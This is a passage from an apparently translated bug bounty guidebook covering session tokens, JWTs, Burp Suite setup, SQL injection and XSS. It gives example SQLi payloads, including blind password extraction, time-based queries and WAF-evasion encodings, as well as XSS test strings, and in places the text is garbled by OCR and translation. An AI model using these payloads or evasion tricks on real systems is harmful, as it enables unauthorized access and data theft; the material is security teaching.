ID when you exit.
Cookies are used by most websites to transmit session data
in HTTP requests. Web servers send small data files known as
HTTP cookies to your browser. The server establishes a session
for you when you connect, and sends the session ID as a cookie
to your browser. Your browser saves cookies and uses them for
each request you make to the same server.
• Login: Enter your username and password on a web-
site or application.
• Verification: The system verifies your credentials and,
if correct, generates a unique token (a digital code).
• Granting access: The token is sent back to your device
(computer, phone, etc.).
• Subsequent access: When you return to the same
website or application, you do not have to re-enter
your password. Instead, your device sends the token
to the system.
• Validation: The system verifies the validity of the token
(making sure it has not expired or been tampered with)
and grants you access.

28 MILLIONAIRE RECORDS
 JSON Web Tokens

An open industry standard called JSON Web Token is used

to transfer data between two entities, typically a client (such as
the front end of your application) and a server (the back end of
your app).
They include JSON objects with the shared data inside them.
In order to prevent the client or a hostile third party from chan-
ging the JSON content, sometimes referred to as JWT claims,
each JWT is also signed using cryptography (hashing).
For example, Facebook produces a JWT with the following
claims and loads JSON when connecting to them.
{ quick access to its functionality and help you identify bugs.
"iss": "https://login.facebook.com",
"azp": "34234123.apps.facebook.com"
}
Learn to program
Now that you have a solid foundation, you should be able
to understand most of the vulnerabilities we are going to dis-
cuss. I advise you to learn programming before setting up your
hacking tools. Programming knowledge is beneficial since finding
flaws requires a lot of repetitive work. By learning a language
like Python or Shell Scripting, you can automate these procedu-
res and save a ton of time.
Most websites are built in JavaScript, so you should learn
to read it as well. Examining a website's JavaScript can give you

e yJ h b G c i O i J I U z I 1 N i I s I n R 5 c C I 6 I k pX V C J 9 . e yJ -
zdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikp-
vaG 4 gRG 9 lIi w i aW F 0 Ij oxN T E 2 MjM 5 M D Iy f Q.
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

JSON web tokens provide a secure means of user iden-

tification when used correctly. Upon receipt of the token, the
server can confirm that it has not been tampered with by exa-
mining the accuracy of the signature. The information in the
payload portion can be used by the server to determine who
the user is. In addition, the user cannot change the payload and
sign the token himself because he does not possess the secret
key necessary to do so.

However, there are ways an attacker can bypass the security

process and forge random tokens if done incorrectly.

bug bounty ' s F undamentals 29

1. 2 - SETU P # 1. 2
It is one of the most important points to set up a good setup
before you start your hacking career, you will save a lot of time
and headache. I will guide you through setting up your hacking
environment step by step in this chapter.
Selection of an operating system
To use Burp Suite, a web proxy that allows you to view and
modify HTTP requests and responses transmitted between your
browser and web servers, you must configure your browser to
work with it. You'll discover how to use Burp's functionality to
send repetitive and automated requests, decode encrypted con-
tent, and compare queries. I'll also discuss how to write effec-
tive bug bounty notes.
I apologize in advance for upsetting some people, but
please read on so I can explain what I mean. Using Microsoft
Windows or macOS as your "daily driver" is perfectly accepta-
ble. Numerous accomplished bug hunters use these proprie-
tary operating systems, as evidenced by their publicly available
lectures and YouTube videos. But many of the same people also
use cloud-based Linux-based virtual private servers (VPS) for
reconnaissance and web request proxies.
Since many open source hacking tools are designed for
Unix-based computers, such as Kali Linux or macOS, I advise
you to use one of them. Kali Linux is a Linux variant aimed at
hacking and digital forensics. It has a ton of useful bug bounty
tools, including fuzzers like Wfuzz, recon tools like DirBuster and
Gobuster, and Burp Suite. Kali Linux is available for download
at https://www.kali.org/downloads/.
If you are not able to use these alternatives, you are wel-
come to hack other operating systems. Just be aware that you
may need to acquire the use of tools other than those listed in
this book.
Installing a browser and proxy: The basics
Bug bounty hunters use Burp Suite, a powerful tool, exten-
sively to discover vulnerabilities in web applications. It is a group
of technologies that combine to make the process of testing web
applications for security flaws more efficient and automated. I
will go over several tricks and strategies for using Burp Suite for
bug bounty hunting in this book.
30 MILLIONAIRE RECORDS
Burp Suite can be used to intercept and modify HTTP/
HTTPS requests.
The browser will be used to examine the functionality of
an application. Firefox is the easiest to set up with a proxy, so I
suggest you use it. When hacking, you can also use two sepa-
rate browsers: one to scan the target and one to look for online
security holes. This way, you can quickly separate traffic related
to your intended application for further analysis.
Software that acts as an intermediary between a client and
a server is known as a proxy; in this case, the intermediary is your
browser and the web servers it communicates with. It does this
by intercepting both your requests and the server's responses
before sending them to you. For example:
Browser <--------------> Proxy <--------------> Server
It is imperative to use a proxy for bug bounty hunting. As I
will describe later in this chapter, proxies allow you to view and
modify the requests that are sent to the server and the responses
that arrive at your browser. In the absence of a proxy, communi-
cation between the browser and the server would occur auto-
matically and in secret; all that would be visible to you would be
the finished web page. Alternatively, all messages would be inter-
cepted by a proxy before they reach their intended destination.
Because of this, you can perform recon using proxies by
examining and analyzing traffic entering and leaving the server.
They also allow you to investigate intriguing requests to find
any security holes and manipulate requests to exploit these
weaknesses.
 Let's take an example where you browse your email inbox
and use a proxy to intercept the request that returns your email.
This is a GET request directed to a URL containing your user
ID. It also notes that the request contains a cookie containing
your user ID:
To determine if you can access another user's information
in this situation, try changing the USER_ID in the URL to that
of the other user. The server will probably accept the request
and give you access to the object or it may send a direct 403
error, indicating that you cannot read that type of information.
Launching the Browser Embedded
Burp Suite both provide built-in browsers. You can skip
the next two steps if you decide to try these built-in browsers.
After launching Burp, select the Open Browser option on
the Proxy tab to use Burp Suite's built-in browser. Without any
further configuration, Burp will automatically route all traffic
from this built-in browser.
bug bounty ' s F undamentals
Configure Firefox
Burp's built-in browser provides an easy method to start
your bug search with little configuration. On the other hand, Burp
can be configured to work with your browser if, like me, you prefer
to try a familiar one. Let's configure Burp to work with Firefox.
Installing a proxy and downloading your browser are the
first steps. Downloads for the Burp Suite and Firefox browser
are available at https://portswigger.net/burp/ and https://www.
mozilla.org/firefox/new/, respectively.
One of the two versions of Burp Suite is used by bug bounty
hunters: Professional or Community. Burp Suite Community is
available for free, however, Burp Suites Professional requires a
license. A vulnerability scanner and other handy features, such
as the ability to save a job, are included in Burp Suite Pro.
A vulnerability scanner and other handy features, such as
the ability to save and continue a work session at a later time,
are included in Burp Suite Pro. In addition, it provides the Burp
Invader in its entirety, whereas the community version only has
a condensed version. I'm going to talk about how to use the
community version of this book to find bugs.
Now you need to configure your browser to use its proxy
to redirect traffic. You can configure Firefox to work with Burp
Suite by following the instructions in this section. Refer to the
official documentation for the other browser/proxy combination
you are using for tutorials.
Open Firefox. Then, select Preferences > General Network
Settings to display the Connections Settings page. The Preferences
tab is available through the menu in the upper right corner of
Firefox.
31
 The Connection Settings page should look similar to the
one shown in the figure.

For each protocol type, choose Manual proxy settings and

enter 127.0.0.1 as the IP address and 8080 as the port. This
will instruct Firefox to route all its traffic through the machine's
port 8080 service. The IP address of the localhost is 127.0.0.1.
It recognizes the system you are now using, allowing you to use
it to access the network services that are available on it.

Burp works by default on port 8080, so this setting instructs

Firefox to send all traffic through Burp. To complete the setting,
click OK. All traffic will now be redirected through Burp by Firefox.

This process can be automated by means of a Firefox exten-

The Preferences option is located in the upper right cor-
ner of Firefox.
sion called FoxyProxy. You can find it at https://addons.mozilla.
org/en-US/firefox/addon/foxyproxy-basic. It is very simple,
you configure the IP as you did in Firefox, but instead of doing
it in the browser, as indicated in the previous steps, you do it
in the extension directly. In addition, it allows you to enable or
disable the proxy with a click. Maybe now you think it's an uni-
mportant extension. I am sure that in the future you will thank
me for recommending it.

32 MILLIONAIRE RECORDS
 Getting things ready for Burp
Open Burp Suite after downloading it, select Next, and then
click Start Burp. There should be a window like this.
Now let's configure Burp to work with HTTPS traffic. By
encrypting your traffic and limiting access to it to only the two
parties involved in a communication, your browser and the ser-
ver, HTTPS protects the privacy of your data. This means that
HTTPS traffic entering and leaving your browser cannot be
intercepted by your Burp proxy. Installing the certificate autho-
rity (CA) certificate for your Burp proxy will tell Firefox that it is
a trusted entity, which will solve this problem.
Now that Firefox has the Burp certificate installed, it can
work with HTTPS traffic. Open your browser and navigate to
http://burp/ with Burp open and running and your proxy set-
tings set to 127.0.0.1:8080.
Next, select Preferences > Privacy and Security > Certificates
in Firefox.
See Authorities and Certificates. After selecting the file you
just saved with Import, click Open. To rely on the certificate to
identify websites, according to the instructions in the dialog.
bug bounty ' s F undamentals
Select the Trust this CA to identify websites option in the
Firefox dialog.
Restart Firefox. You should now be ready to intercept tra-
ffic over HTTP and HTTPS.
Let's perform a test to make sure Burp is working properly.
Navigate to the Proxy tab in Burp and select Intercept is off to
enable traffic interception. At this point, the button should say
Intercept is on. This indicates that you are intercepting Firefox
or embedded browser traffic.
Open Firefox after that, and navigate to https://www.goo-
gle.com. You should notice that individual requests start appea-
ring in the main Burp proxy window.
The Forward Burp Proxy button forwards the active request
to the specified server. When the request with the hostname
www.google.com appears, click Forward. Burp is successfully
intercepting Firefox traffic if it sees this request. This should
get you started.
------------------------------------
GET / HTTP/1.1
Host: www.google.com
------------------------------------
To transmit the request to the Google server, click Forward.
The Google home page should open in a Firefox window for you.
In the event that the requests are not displayed in the Burp
window, it is possible that the Burp CA certificate has not been
installed correctly. To reinstall the certificate, follow the instruc-
tions in this chapter. Also, confirm that the proxy settings in the
Firefox Connection Settings are set correctly to 127.0.0.1:8080.
33
 Using Burp
The web proxy is not the only useful feature in Burp Suite.
A repeater to modify specific requests, a decoder to decode
encrypted content, an intruder to automate attacks, and a com-
parison tool to compare requests and responses are also inclu-
ded in Burp Suite. We will discuss these here because they are
the most useful features of Burp for bug bounty.
Proxy
Let's see how to inspect, edit and forward requests to other
Burp modules using the Burp proxy. Explore Burp's capabilities
by opening it, selecting the Proxy tab and getting started! Make
sure the Intercept button is read to start intercepting traffic. The
interceptor is active.
When using the built-in Firefox browser or Burp to access
a website, an HTTP/HTTPS request should appear in the main
window. Every request your browser makes while interception
is enabled will pass through Burp before being sent to the server
unless you choose to click Forward in the proxy window. This is
your opportunity to change the request before sending it to the
server or transmitting it to other Burp modules.
To search for strings in the requests or responses, you can
also use the search box at the bottom of the window.
Let's experiment using Burp Proxy to intercept and mani-
pulate traffic!
Enable traffic interception by going to Burp Proxy. Next,
launch the built-in Firefox or Burp browser and go to https://
34 MILLIONAIRE RECORDS
www.google.com. Click Forward until you see the request with
the hostname www.google.com, just as you did in the previous
section. This type of request should be visible to you:
By right-clicking on the request or response, you can send
it to several Burp modules.
The Repeater
Most likely the tool you will use the most is the repeater.
It allows you to change requests and thoroughly review server
responses. It can also be used to save intriguing requests for
later review.
While you can change requests with the repeater and the
invader, their functions are completely different. By automatically
delivering requests that have been mechanically modified, the
hacker automates attacks. The repeater is designed for manual,
in-depth changes to a single request.
By right-clicking on the request and choosing "Send to
Repeater", you can send requests to the repeater, the requests
are displayed on the left side of the repeater screen. Here, you
can edit a request and click the Send button at the top to send
the request.
 in parameters affects the response you receive from the server.
To send data to the comparator, select Send to Comparator
from the context menu when right-clicking on a highlighted sec-
tion of text in any request or response.

The Decoder

The data found in the requests and responses can be easily

encoded and decoded using the Burp decoder (Figure 4-15). I
use it primarily to encode, decode, and manipulate application The comparison tool will indicate the variations between
data before sending it to applications. two text blocks.

Save Burp requests

In Burp, you can also save requests and responses. To save

these results to your notes folder for that destination, simply righ-
t-click on each request and select the URL of the request that
can be copied using the Copy URL option. The entire request,
including the method, URL, headers and body, is copied as a curl
command when using Copy as command. The request is saved
as a separate file when copied to one.
To send data to the decoder, select Send to decoder from
the context menu when right-clicking on a highlighted section
of text in any request or response. To choose the algorithm
to be used to encode or decode the message, use the drop-
-down options on the right. Use smart decoding to determine
the encryption algorithm for the message if you are unsure. Burp
will attempt to recognize the encryption and adjust the message
decoding accordingly.

The Comparer
One method of comparing requests or responses is with the
comparator. It draws attention to variations between two blocks
of text. For example, you can use it to investigate how a change

bug bounty ' s F undamentals 35

 Concluding notes

A brief note of caution before we start looking for vulnerabi-

lities in the next chapter: being well organized is essential for suc-
cessful bug bounties. The amount of information acquired from
targets can grow and become difficult to manage when working
on targets with large scopes or hacking multiple targets at once.

You will not always be able to identify bugs right away.

Rather, you will notice a lot of oddities and misconfigurations
that are not exploitable at the moment, but which you can later
combine with other actions to launch an attack. To ensure that
you can promptly use all the new features, misconfigurations,
small flaws and suspicious endpoints you observe, you will need
to make detailed notes about them.

Also, note the help in planning attacks. You have the ability
to monitor the progress of your hacking, as well as the features
you have tested and those you still need to verify. By doing so,
you can avoid wasting time repeatedly testing the same features.

Making notes on vulnerabilities you discover is another use-

ful use of them. Keep track of the specifics of any vulnerability,
including its theoretical underpinnings, possible consequences,
exploitation methods, and proof-of-concept code. This will hone
your technical skills over time and create a technical bank that
you can refer to when needed.

One of my main strategies now and since I started, is not

to focus on looking for critical vulnerabilities. There are many
hackers who always aim to find the highest bug, but not always
that bug comes and it is much more difficult than it seems to one.
That's why my strategy is quantity over quality, I know the phrase
is backwards but it works for me and you bought my mentorian
to give you all my knowledge and not to give you false ideas.

My daily session is in the afternoon; I go searching for a cou-

ple of hours with the goal of finding 1-3 bugs per day. Imagine
that for each bug you get paid $500 or $1,000 only, it's a fortune
to earn that kind of money per day and it seems to me a serious
thing to follow the theory that finding low/medium impact bugs
can make you a real millionaire.

36 MILLIONAIRE RECORDS
bug bounty ' s F undamentals 37
 C H A P T E R T W O

WEB VULNERABI-
LITIES
2
2 . 1 - SQ L I NJE C T I O N
#2.1
SQL Injection (SQLi): What is it?
An online security flaw known as SQL injection (SQLi) allows
an attacker to manipulate queries that an application sends to its
database. An attacker might be able to see data that they would
not normally be able to access because of this. This could include
other data that the program has access to or data that is owned
by other users. This data can often be altered or deleted by an
attacker, changing the behavior or content of the program in a
way that is persistent.
A SQL injection attack can occasionally be escalated by an
attacker in order to compromise the underlying server or other
back-end infrastructure. They may also be able to carry out
denial-of-service attacks because of it.
What is the impact of a successful SQL injection attack?
A successful SQL injection attack can result in unauthori-
zed access to sensitive data, such as:
• Passwords.
• Credit card details.
• User's personal information.
SQL injection attacks have been used in many high-pro-
file data breaches over the years. They have caused reputatio-
nal damage and regulatory fines. In some cases, an attacker can
gain a persistent backdoor into an organization's systems, lea-
ding to a long-term compromise that can go undetected for an
extended period.
How to find vulnerabilities related to SQL injection
By performing a methodical set of tests against each appli-
cation entry point, you can manually identify SQL injection.
Normally, to accomplish this, you would submit:
• The character of the solitary quotation "and look for
errors or other irregularities."
• A certain specific SQL syntax evaluates both the base
(original) value of the entry point and a new value,
and looks for consistent variations in the application's
40 MILLIONAIRE RECORDS
responses.
• Boolean conditions such as OR 1=1 and OR 1 =2, and
look for variations in the responses given by the appli-
cation.Loads that, when triggered within a SQL query,
are intended to cause time delays and look for varia-
tions in response times.
• OAST utility loads that, when used in an SQL query,
are intended to cause out-of-band network interaction.
SQL injection occurring in several query sections
Most SQL injection problems occur in the WHERE clause
of a SELECT query. Most experienced testers are familiar with
this type of SQL injection.
SQL injection vulnerabilities, however, can appear anywhere
in the query and in a variety of query formats. Other typical pla-
ces where SQL injection occurs include:
• Within the WHERE clause or the values changed in
UPDATE statements.
• Within the values inserted in INSERT statements.
• Within the table or column name in SELECT statements.
• Within the ORDER BY clause of SELECT queries.
SQL injection examples
There are numerous SQL injection techniques, attacks and
vulnerabilities, and they arise in a variety of contexts. Typical
instances of SQL injection include:
• Find hidden information, where you can change a
SQL query to get more information.
• Changing a query to hinder the application logic is
known as subverting the application logic.
• UNION attacks, which allow you to obtain informa-
tion from several database tables.
• Blind SQL injection occurs when an application res-
ponds without returning the answers to a query it con-
trols. Get hidden data
Consider a shopping application that lists items according to
different categories. The user's browser prompts for the following
URL when clicking on the Gifts category: https://insecure-web-
site.com/products?category=Gifts
 This causes the program to make an SQL query to get infor-
mation about the relevant products from the database:
SELECT * FROM goods WHERE released = 1 AND category
= "Gifts".
With this SQL query, the database is asked to provide:
• All information (*) from the product table, where the
released number is 1 and the category is gifts.
• Products that are not released are hidden by the release
constraint = 1. For unannounced goods, we can pre-
sume that it is released = 0.
The application does not implement any defense against
SQL injection attacks. This means that an attacker can construct
the following attack, for example:
https://insecure-website.com/products?category=Gifts'
-- This results in the SQL query:
SELECT * FROM products WHERE category = 'Gifts'--'
AND released = 1
• Crucially, note that -- is a comment indicator in SQL.
This means that the rest of the query is interpreted as
a comment and removed. In this example, this means
that the query no longer includes AND released = 1.
• As a result, all products are displayed, including those
that have not yet been released. You can use a similar
attack to make the application display all products in
any category, including categories you do not know
about:
h t t p s : // i n s e c u r e - w e b s i t e . c o m /
products?category=Gifts'+OR+1=1--
Blind SQL injection-related vulnerabilities
Blind vulnerabilities represent a large number of SQL injec-
tion cases. This indicates that neither the output of the SQL query
nor the details of database failures are returned by the applica-
tion in its responses. Although blind vulnerabilities can still be
used to obtain unauthorized data, this generally requires more
advanced and difficult procedures.
Depending on the characteristics of the vulnerability and
the database in question, blind SQL injection vulnerabilities can
be exploited using the following methods:
• By changing the query logic, you can make the appli-
cation's response noticeably different depending on
whether a single condition is true or not. This could
be adding a new condition to a Boolean logic or gene-
rating an error conditionally, such as a divide by zero.
• It is possible to conditionally initiate a time delay in
query processing. This allows you to infer the actual
status of the condition based on the time it takes for
the application to respond.
Using OAST techniques, you can initiate an out-of-band
network interaction. This method is quite effective and can be
used in circumstances where the other methods cannot. Data
can often be exfiltrated directly using the out-of-band channel.
You can use the information, for example, in a DNS lookup for
a domain you own.
Searching for blind SQL injections.
Blind SQL injections, also known as inferential SQL injec-
tions, are a bit more difficult to find and use. They occur when
an application produces no useful SQL data or error messages,
making it impossible for attackers to retrieve information directly
from the database.
In this case, by delivering SQL injection payload to the ser-
ver and monitoring its subsequent actions, attackers can deduce
information. Additionally, there are two varieties of blind SQL
injections: time-based and Boolean.
Boolean-based SQL injection is the process by which oppo-
nents insert test conditions into a SQL query that would give a
true or false result, hence the deduction of the database struc-
ture. Attackers could gradually deduce the contents of the data-
base using those answers.
Let's take an example where example.com tracks its premium
web vulnerabilities 41
subscribers on the platform using a different table.
In addition to having access to enhanced features, premium
users' home pages have a banner that says "Welcome, premium
member!" By using a cookie containing the user's ID and com-
paring it to a list of registered premium members, the website
establishes who is premium. This is what the GET request may
look like with such a cookie.
--------------
GET /
Host: example.com
Cookie: vulnerable_id=1
--------------
This request is used by the program to generate the SQL
query that follows:
SELECT * FROM PremiumUsers WHERE Id='1';
The user is a premium member if this query yields results,
in which case the banner "Welcome, Premium Member!" will
appear. The banner will not appear if it does not. Suppose you
have a non-premium account. If you were to submit this user ID
instead, what would happen?
--------------
2' UNION SELECT Id FROM Users
WHERE Username = 'admin'
and SUBSTR(Password, 1, 1) ='a';-
--------------
Therefore, the query would be as follows:
--------------
SELECT * FROM PremiumUsers WHERE Id='1'
UNION SELECT Id FROM Users
WHERE Username = 'admin'
and 1SUBSTR(Password, 1, 1) = 'a';--
--------------
The SUBSTR(STRING, POSITION, LENGTH) function takes
a substring of a given LENGTH and POSITION within a string
and extracts it.
Consequently, the initial character of each user's password
42 MILLIONAIRE RECORDS
is returned by SUBSTR(Password, 1, 1) 1. Because user 2 is not a
premium member, the second SELECT statement, which returns
results if the administrator account password begins with a, will
determine whether or not this query provides data. For example,
if you send this user ID as a cookie, the web application will dis-
play the premium banner if the admin account password starts
with an a. This indicates that you can brute force the adminis-
trator password. Until it works, you can try this query with the
letters b, c, and so on.
This method can be used to retrieve important information
from the database, including the Database version, table names,
column names and credentials. I introduce more details about
this on page 201 of "Escalating the Attack".
Similar techniques are used in time-based SQL injections,
where the attacker relies on the difference in response time
caused by various SQL injection workloads rather than a visual
cue on the online site. What might happen, for example, if the
injection point in the example above does not produce visual
cues about the query result? Let's assume that premium mem-
bers do not receive a unique banner and that their user interfa-
ces are the same. So how can this SQL injection be leveraged?
Using SQL Injection Automatically
Manual SQL injection verification is not scalable. To auto-
mate each step of the approach described in this chapter, from
SQL injection identification to exploitation, I suggest employing
tools. For example, a Python application called sqlmap (http://
sqlmap.org/) simplifies the process of finding and exploiting the
203 SQL injection vulnerabilities. Although this book cannot
cover a complete instruction on sqlmap, its documentation can
be accessed at https://github.com/sqlmapproject/squlmap/wiki/.
Make sure you understand each sqlmap approach before
automating your attacks so that you can maximize your attack
efficiency. This chapter covers most of its techniques. Sqlmap
is a tool that can be used independently or integrated with the
test proxy.
You make use of. For example, by installing the SQLiPy Burp
plug-in, you can incorporate sqlmap into Burp.
 How to locate your first injection

SQL Investigate SQL injection vulnerabilities in practice

applications or bug bounty programs. It is interesting to iden-
tify and exploit these vulnerabilities. If you wish, you can try
to attack a deliberately vulnerable application, such as Damn
Vulnerable Web Application, as SQL injections can sometimes
be difficult to exploit. It is available at http://www.dvwa.co.uk.
Then, to start identifying real SQL injection vulnerabilities in the
field, adhere to this roadmap:

1. Any endpoint in the application that receives user input

must be mapped.
2. To find out if these locations are susceptible to SQL
injections, insert test loads into them. Try using infe-
rential approaches instead of traditional SQL injections
if the endpoint is not susceptible to them.
3. After verifying that the endpoint is susceptible to SQL
injections, employ several SQL injection queries to
expose the database data.
4. Take the question further. Determine what informa-
tion can be obtained from the endpoint and whether
it is possible to bypass authentication. Be careful not
to perform any operations that could compromise the
integrity of the target database, such as deleting user
information or changing the Database structure.

web vulnerabilities 43

Bypass protection
As SQL injection vulnerabilities have become more widely
known, developers and system administrators have imple-
mented various protective measures to mitigate this risk.
However, persistent attackers have developed techniques
to evade these protections and continue to exploit SQL
injection vulnerabilities. This chapter explores the tactics
and strategies used to circumvent SQL injection defenses.
1. Input Filter Evasion
Objective: To introduce malicious payloads despite input
filters designed to block them.
Techniques:
• Keyword obfuscation: Use comments, whitespace,
special characters or encoding to hide keywords such
as SELECT, UNION, DROP, etc.
• Use of synonyms and alternative functions: Replace
keywords with synonyms or equivalent functions (e.g.,
|| instead of CONCAT).
• Multi-stage injection: Split the payload into mul-
tiple parts and combine them on the server.
• Example:
1. Original payload: ' UNION SELECT password
FROM users--
2. Obfuscated payload: '/**/UnIoN/**/SeLeCt/**/
password/**/FrOm/**/users--
2. WAF (Web Application Firewall) Evasion
Objective: To circumvent the detection rules of a WAF
to prevent it from blocking malicious requests.
Techniques:
• Payload obfuscation: Use techniques similar to those
used to bypass inbound filters.
• Fragmentation of payloads: Split the payload into
multiple requests to prevent the WAF from detecting
it in its entirety.
• Use of encoding techniques: Encode the payload in
different formats (URL encoding, hexadecimal, base64)
to make detection more difficult.
Example:
• Original payload: ' UNION SELECT password FROM
44 MILLIONAIRE RECORDS
users--
• URL-encoded payload: %27%20UNION%20
SELECT%20password%20FROM%20users--
3. Time Based Attacks
Objective: To extract information from the database
through the server response time.
Techniques:
• Time-based blind SQL injection: Use functions
such as SLEEP or BENCHMARK to delay the server
response if a specific condition is met.
• Measuring response time: Measure the time it
takes for the server to respond to deduce whether the
condition is met or not.
Example:
• ' AND IF(SUBSTRING(password,1,1)='a', SLEEP(5),
1)-- (Delay 5 seconds if the first character of the pas-
sword is 'a'.)
4. Second Order Attacks
Objective: Exploit SQL injection vulnerabilities that mani-
fest themselves at a later stage, after the malicious data has
been stored in the database.
Techniques:
• Storing malicious payloads: Entering payloads in
fields that are stored in the database.
• Activate payloads at a later stage: Retrieve data
stored in a vulnerable context to execute the payload.
Advanced SQL Injection Defenses
• Prepared Statements: Parameterize SQL queries to
prevent user-supplied data from being interpreted
as code.
• Stored Procedures: Limit the operations that a user
can perform on the database.
• Whitelisting: Allow only specific and valid input values.
• Escaping: Correctly encode special characters to pre-
vent them from being interpreted as code.
Escalating the attack
This type of chapter generally delves into how an attacker
can exploit an initial SQL injection vulnerability to gain
greater control over a system or database. Here are some
key issues you might encounter:

Beyond Data Extraction: While SQL injection is often asso-

ciated with the extraction of sensitive data, escalation attacks
go beyond that. Attackers may attempt:

• System Command Execution: Using SQL injection to

execute commands on the underlying operating system,
which could allow them to take control of the server.
• Elevation of Privileges: Gain access to user accounts
with higher privileges within the database.
• Data Clearing: Modify or delete data in the database.

Types of Climbing:
• Second Order SQL Injection: The attacker inserts
malicious code that is executed later when a different
request is processed.
• Inference-Based SQL Injection: The attacker dedu-
ces information about the database structure through
server responses to manipulated SQL queries.
• Blind SQL Injection: The attacker does not see
the results of your SQL queries directly, but can infer
information based on the behavior of the application.

Climbing Techniques:
• Database Enumeration: Discover database names,
tables and columns.
• Identification of Functions and Stored Procedures:
Find out which functions and procedures are available
in the database and how they can be used.
• Use of Operating System Functions: Execute ope-
rating system commands through functions such as
xp_cmdshell (in SQL Server).

Mitigation:
• Query Parameterization: Use parameterized queries to
prevent user input from being interpreted as SQL code.
• Validation of Inputs: Ensure that all input is valid
• Principle of Least Privilege: Grant user accounts only
the privileges necessary to perform their tasks.

web vulnerabilities 45
2 . 2 - CRO S S - S I TE
SC R I P T I N G ( X S S ) # 2.2
Cross-site scripting (XSS) is one of the most common and
potentially damaging vulnerabilities found in web applications.
In this chapter, I will explain what XSS is, how it works, and
share some real-world examples that illustrate its impact. I will
also share how I, Santiago Lopez, excelled at finding these bugs
throughout my career.
Understanding cross-site scripting (XSS)
Cross-site scripting occurs when an attacker is able to inject
malicious scripts into the content of trusted websites. XSS vul-
nerabilities can lead to unauthorized actions being performed
in the context of another user's session, data theft or the spread
of malware.
There are three main types of XSS:
• XSS stored: The malicious script is stored on the target
server, such as in a database, comment field or mes-
sage board. When a user requests the stored informa-
tion, the script is delivered as part of the response and
executed by the user's browser.
• Reflected XSS: The malicious script is reflected outside
of a web server, such as in an error message, search
result, or any other response that includes data sent
to the server as part of the request. The script is then
executed by the user's browser.
• DOM-based XSS: The vulnerability exists in the clien-
t-side code and not on the server side. The script is
executed as a result of modifying the Document Object
Model (DOM) of the web page.
46 MILLIONAIRE RECORDS
Real-world examples
Let's look at some real-world examples of XSS vulnerabi-
lities to understand how they work and the potential damage
they can cause.
Example 1: XSS stored in a comment field
Imagine a blogging platform where users can leave com-
ments on posts. An attacker could post a comment like this:
--------------------
<script>alert('XSS');</script>
--------------------
If the platform does not properly sanitize the input, this
script will be stored in the database and will be displayed on
the page every time a user views the comments section. When
executed, an "XSS" alert box will be displayed.
Example 2: XSS reflected in a search function
Consider a web application with a search feature that dis-
plays the search query back to the user. An attacker could create
a URL like this:
--------------------
http://example.com/search?q=< script>alert('XSS');</script>
--------------------
If the application reflects the search term without proper
coding, the script will be executed by the browser, displaying
an "XSS" alert box.
 Example 3: DOM-based XSS in client-side JavaScript XSS vulnerability prevention

Suppose a website has a JavaScript function that reads a
parameter from the URL and writes it to the page:
--------------------
var searchParam = nueva URLSearchParams(window.loca-
tion.search).get('q'); document.write(search Param);
--------------------
An attacker could use a URL like this one:
--------------------
http://example.com/?q=< script>alert('XSS');</script>
--------------------
Since the script is written directly to the page without saniti-
zation, it will be executed by the browser, displaying the alert box.
My success with finding XSS bugs
Throughout my career, I have identified numerous XSS
vulnerabilities, which have been both challenging and rewar-
ding. Finding XSS bugs requires a keen eye for detail and a deep
understanding of how web applications handle user input.
To prevent XSS vulnerabilities, web developers should:
• Sanitize input: always sanitize user input by remo-
ving or encoding special characters that could be used
in scripts.
• Use security libraries: Use security libraries and fra-
meworks that provide built-in protection against XSS.
• Content Security Policy (CSP): Applies a content
security policy to restrict the sources from which scripts
can be loaded and executed.
Cross-site scripting is a powerful vulnerability that can have
serious consequences if left unchecked. By understanding how
XSS works and learning from real-world examples, you can bet-
ter protect web applications from these attacks. Throughout my
career, finding and reporting XSS vulnerabilities has been one
of my specialties, leading to significant improvements in the
security of various platforms.
Once the page is detected as vulnerable to XSS, the payload
will be displayed in the browser like this.

One of my most notable successes was the discovery of an

XSS vulnerability stored in a major social networking platform.
The vulnerability was located in the profile description field,
where users could enter text to describe themselves. By crafting
a carefully constructed payload, I demonstrated how an attacker
could inject malicious scripts that would execute every time
someone viewed the affected profile. This bug could have been
exploited to steal session cookies, perform actions on behalf of
other users, or spread malware.

Another significant finding was an XSS vulnerability reflec-

ted on a popular e-commerce site. The search function reflected
user input without proper coding, allowing me to inject scripts
that run in the browser of anyone who clicks on a specially cra-
fted link. This vulnerability had the potential to hijack user ses-
sions and manipulate user data.

web vulnerabilities 47

Types of XSS
1. Reflected XSS
Reflected XSS is the most basic type of XSS. It occurs when
user-supplied data is included in the server's HTTP response
without being properly validated or encrypted. The attacker tri-
cks the victim into clicking on a malicious link or submitting a
manipulated form, which causes the malicious script to execute
in the victim's browser.
Characteristics:
• The malicious script is not stored on the server.
• The attack is executed immediately after the victim
interacts with the link or form.
• The impact is limited to the victim's current session.
Example:
https://example.com/search?q=<script>alert('XSS')</script>
In this example, the attacker includes a <script> tag in the
search parameter q. If the web application does not validate or
encode this parameter, the script will be executed in the victim's
browser when he clicks on the link.
2. Stored XSS
Stored XSS is a more dangerous type of XSS. It occurs when
user-supplied data is stored on the server (e.g., in a database) and
then included in HTTP responses without being properly valida-
ted and encrypted. The malicious script is executed each time
a user visits the affected page, which can affect multiple users.
Characteristics:
• The malicious script is stored on the server.
• The attack is executed every time the affected page
is loaded in any user's browser.
• The impact can be much greater than the reflected
XSS, as it can affect multiple users over an extended
period.
48 MILLIONAIRE RECORDS
Example:
An attacker could inject a malicious script into a forum com-
ment or blog post. This script would be stored in the database
and executed every time someone viewed the comment or post.
3. DOM Based XSS
DOM-based XSS is a type of XSS that occurs client-side,
in the victim's browser. The malicious script is not sent to the
server, but is executed directly in the browser through manipu-
lation of the page's Document Object Model (DOM).
Characteristics:
• The malicious script is not sent to the server.
• The attack is executed in the victim's browser through
DOM manipulation.
• It can be more difficult to detect and prevent than
other types of XSS, as it does not involve interaction
with the server.
Example:
https://example.com/page#<script>alert('XSS')</script>
In this example, the attacker includes a JavaScript snippet
in the URL hash. If the web application uses this snippet to
dynamically update the page content without proper validation
and coding, the script will be executed in the victim's browser.
Comprender los diferentes tipos de XSS es fundamental
para poder identificarlos y prevenirlos. Cada tipo de XSS tiene
